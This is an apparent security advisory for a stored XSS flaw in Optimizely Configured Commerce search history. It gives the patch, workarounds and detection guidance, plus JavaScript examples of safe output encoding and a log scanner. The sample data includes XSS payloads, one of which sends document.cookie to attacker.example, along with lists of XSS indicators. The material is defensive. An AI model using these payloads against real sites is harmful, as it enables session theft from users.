CVE-2024-56174
📋 TL;DR
This is a stored cross-site scripting (XSS) vulnerability. An attacker can get script persisted into Optimizely Configured Commerce search history, and that script then runs in a user's browser when the stored history is rendered. It affects Optimizely Configured Commerce versions before 5.2.2408 where search functionality is enabled.
💻 Affected Systems
- Optimizely Configured Commerce
⚠️ Risk & Real-World Impact
Worst Case
Attackers could steal session cookies, redirect users to malicious sites, perform actions on behalf of authenticated users, or install malware via drive-by downloads.
Likely Case
Session hijacking, credential theft, and unauthorized actions performed in the context of authenticated users.
If Mitigated
With output encoding applied wherever search history is rendered, stored payloads display as inert text and do not execute. If only partial mitigations are in place (CSP, HttpOnly session cookies, WAF filtering), impact is reduced to what a script can still do inside the current user's session, such as reading page content or issuing requests as that user.
🎯 Exploit Status
Exploitation requires the attacker to get a payload persisted into search history, typically by submitting a crafted search query through the normal search function. Because the payload is stored, it executes later when a user views the search history, with no further interaction from the attacker.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 5.2.2408
Vendor Advisory: https://support.optimizely.com/hc/en-us/articles/32344323720973-Configured-Commerce-Security-Advisory-COM-2024-01
Restart Required: Yes
Instructions:
1. Download Optimizely Configured Commerce version 5.2.2408 or later from official sources.
2. Back up the current installation and database.
3. Apply the update following Optimizely's upgrade documentation.
4. Restart all application services.
5. Verify the update was successful.
🔧 Temporary Workarounds
Disable Search History
Temporarily disable search history functionality so payloads are neither stored nor rendered.
Modify the application configuration to disable search history features.
Implement Input Validation and Output Encoding
Add server-side validation of search query inputs before storage (length limits, rejection of control characters) and HTML-encode every stored term at the point where search history is rendered. Input filtering alone is bypassable and can break legitimate searches that contain "<" or quotes; output encoding is the control that actually stops the stored script from executing.
Implement input validation filters for all search parameters and contextual output encoding in the search history view.
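The contrast below is an added example, not code from Optimizely or from this advisory. It renders a stored search-history list the vulnerable way (raw concatenation into markup) and the fixed way (HTML-encoding each value for the context it lands in), and shows a storage-time validator that is useful as defence in depth but does not, on its own, prevent the XSS. The entry shape `{ term, searchedAt }`, the sample history and all function names are assumptions for illustration.

```javascript
// Added example, not Optimizely's code: output encoding, not input filtering,
// is the control that stops a stored search-history XSS. The entry shape
// { term, searchedAt } and the function names are assumptions.

// Constructed sample: search history as it might be read back from storage
// after an attacker submitted a crafted query.
const SAMPLE_HISTORY = [
  { term: "running shoes", searchedAt: "2024-08-01T10:00:00Z" },
  {
    term: "<img src=x onerror=\"fetch('https://attacker.example/?c='+document.cookie)\">",
    searchedAt: "2024-08-01T10:05:00Z",
  },
];

// Vulnerable pattern: the stored term is concatenated straight into markup,
// so the browser parses the attacker's <img> tag and fires its onerror handler.
function renderHistoryUnsafe(history) {
  return "<ul>" +
    history.map((e) => `<li data-time="${e.searchedAt}">${e.term}</li>`).join("") +
    "</ul>";
}

// HTML entity encoding for element-text and double-quoted-attribute contexts.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Fixed pattern: every untrusted value is encoded before it is placed in markup.
function renderHistorySafe(history) {
  return "<ul>" +
    history.map((e) => `<li data-time="${escapeHtml(e.searchedAt)}">${escapeHtml(e.term)}</li>`).join("") +
    "</ul>";
}

// Defence in depth at storage time: cap length and reject control characters.
// Deliberately does not strip "<" or quotes, which are legitimate in product
// searches; this reduces attack surface but does not replace output encoding.
function validateSearchTerm(term, maxLen = 200) {
  if (typeof term !== "string") return false;
  if (term.length === 0 || term.length > maxLen) return false;
  return !/[\u0000-\u001f\u007f]/.test(term);
}

// Browser-side equivalent of renderHistorySafe: build text nodes instead of
// assigning innerHTML. Defined only; it needs a DOM to run.
function appendHistoryToDom(listEl, history) {
  for (const e of history) {
    const li = document.createElement("li");
    li.dataset.time = e.searchedAt;
    li.textContent = e.term; // rendered as text, never parsed as HTML
    listEl.appendChild(li);
  }
}

console.log("unsafe:", renderHistoryUnsafe(SAMPLE_HISTORY));
console.log("safe:  ", renderHistorySafe(SAMPLE_HISTORY));
```

Running it prints the unsafe markup with a live `<img ... onerror=...>` element and the safe markup with the same payload as `&lt;img src=x onerror=&quot;...&quot;&gt;`, which the browser shows as literal text. The validator accepts both sample terms, which is the point: a query that passes reasonable input validation can still be an XSS payload once rendered without encoding.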
🧯 If You Can't Patch
- Implement WAF rules that block common XSS patterns in search parameters (script tags, javascript: URIs, on*= event handlers), matching on the URL-decoded value; treat this as a stop-gap, since WAF signatures can be bypassed with alternative encodings and tag variants
- Deploy a Content Security Policy that disallows inline scripts (no 'unsafe-inline' in script-src, or nonce-based script-src) so an injected inline payload is blocked even if it reaches the page; a CSP that still permits inline script does not mitigate this issue
🔍 How to Verify
Check if Vulnerable:
Check if your Optimizely Configured Commerce version is below 5.2.2408 and search history functionality is enabled.
Check Version:
Check application version in admin panel or via version files in installation directory
Verify Fix Applied:
Verify the application version is 5.2.2408 or higher, then, in a non-production environment, submit a harmless test term containing markup (for example <b>test</b>) and confirm that search history displays it as literal text rather than rendering it as HTML.
📡 Detection & Monitoring
Log Indicators:
- Search queries containing markup or script fragments (<script, <img, <svg, javascript:, on*= handlers), including URL-encoded and double-encoded forms
- Bursts of such queries from a single client address or account, which indicates payload probing
Network Indicators:
- Requests from user browsers to unfamiliar external domains, possibly carrying cookie or page data in the URL, immediately after a page that displays search history is loaded
- Referer headers pointing at search or search-history pages on requests to external domains that the storefront does not normally contact
SIEM Query:
search url_decode(query) matches '<script' OR 'javascript:' OR 'on*=' OR '<img' OR '<svg' in search query logs (match on the decoded query, not the raw log line, and require the colon after "javascript" so ordinary search words are not flagged)
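The scanner below is an added example, not part of the advisory or of any Optimizely tooling. It implements the check the SIEM query sketches over a constructed sample of access-log lines: it extracts the search parameter, URL-decodes it repeatedly to defeat double encoding, matches a small set of XSS indicators, and aggregates hits per client address to surface the "burst of suspicious queries" indicator. The log layout (date time client-ip method uri-stem uri-query status, W3C-style with the query URL-encoded so it contains no spaces), the parameter name `q`, and all IPs and hostnames are assumptions.

```javascript
// Added example (not from the advisory or Optimizely): scan access logs for
// search queries carrying XSS payloads. Log layout, parameter name "q", and
// all addresses/hostnames below are assumptions for illustration.

// Constructed sample log: two benign searches (one containing the word
// "javascript"), then single-, double-encoded and attribute-breakout payloads.
const SAMPLE_LOG = `
2024-08-01 10:00:00 198.51.100.7 GET /search q=running+shoes 200
2024-08-01 10:01:12 198.51.100.7 GET /search q=javascript+book 200
2024-08-01 10:05:00 203.0.113.5 GET /search q=%3Cimg+src%3Dx+onerror%3Dalert(1)%3E 200
2024-08-01 10:05:04 203.0.113.5 GET /search q=%253Cscript%253Ealert(document.cookie)%253C%252Fscript%253E 200
2024-08-01 10:05:09 203.0.113.5 GET /search q=%3Csvg%2Fonload%3Dfetch('//evil.example')%3E 200
2024-08-01 10:07:30 192.0.2.9 GET /search q=%22%3E%3Ca+href%3D%22javascript%3Aalert(1)%22%3Eclick%3C%2Fa%3E 200
`.trim();

// Indicators matched against the fully decoded query. "javascript" alone is
// not an indicator; the colon is required to avoid flagging ordinary words.
const XSS_INDICATORS = [
  { name: "script-tag",     re: /<\s*\/?\s*script\b/i },
  { name: "event-handler",  re: /\bon[a-z]+\s*=/i },            // onload=, onerror=, ...
  { name: "javascript-uri", re: /javascript\s*:/i },
  { name: "html-tag",       re: /<\s*(img|svg|iframe|object|embed|body|a)\b/i },
  { name: "data-uri",       re: /data\s*:\s*text\/html/i },
];

// Decode repeatedly until no %XX sequences remain, to defeat double/triple
// encoding. Bounded so a malformed value cannot loop forever.
function fullyDecode(value, maxRounds = 3) {
  let cur = value;
  for (let i = 0; i < maxRounds; i++) {
    if (!/%[0-9a-f]{2}/i.test(cur)) break;
    let next;
    try { next = decodeURIComponent(cur); } catch { break; } // leave undecodable input as-is
    if (next === cur) break;
    cur = next;
  }
  return cur;
}

// Parse one log line into its fields; returns null for lines that do not fit.
function parseLine(line) {
  const parts = line.trim().split(/\s+/);
  if (parts.length < 7) return null;
  const [date, time, ip, method, stem, query, status] = parts;
  // URLSearchParams performs the first decode round and turns "+" into spaces.
  // A "-" query (no parameters) yields no "q" and is skipped by the caller.
  const q = new URLSearchParams(query).get("q");
  return { date, time, ip, method, stem, status, q };
}

// Return one hit per line whose decoded search term matches any indicator.
function scanLog(text) {
  const hits = [];
  for (const line of text.split("\n")) {
    const rec = parseLine(line);
    if (!rec || rec.q === null) continue;
    const decoded = fullyDecode(rec.q);
    const indicators = XSS_INDICATORS.filter((i) => i.re.test(decoded)).map((i) => i.name);
    if (indicators.length) {
      hits.push({ time: `${rec.date}T${rec.time}Z`, ip: rec.ip, query: decoded, indicators });
    }
  }
  return hits;
}

// Clients with repeated suspicious searches, the probing pattern worth an alert.
function repeatOffenders(hits, minHits = 2) {
  const counts = new Map();
  for (const h of hits) counts.set(h.ip, (counts.get(h.ip) || 0) + 1);
  return [...counts].filter(([, n]) => n >= minHits).map(([ip, n]) => ({ ip, hits: n }));
}

console.log(JSON.stringify(scanLog(SAMPLE_LOG), null, 2));
console.log("repeat offenders:", JSON.stringify(repeatOffenders(scanLog(SAMPLE_LOG))));
```

On the sample, the two 198.51.100.7 lines produce no hits (including "javascript book", which a naive substring search for 'script' would flag), the three 203.0.113.5 lines are all flagged and that address is reported as a repeat offender, and the double-encoded `%253Cscript...` query is only recognised because of the second decode round. Matching on the decoded value rather than the raw log line is what makes the rule useful; the indicator list is deliberately small and should be extended from your own traffic rather than treated as complete.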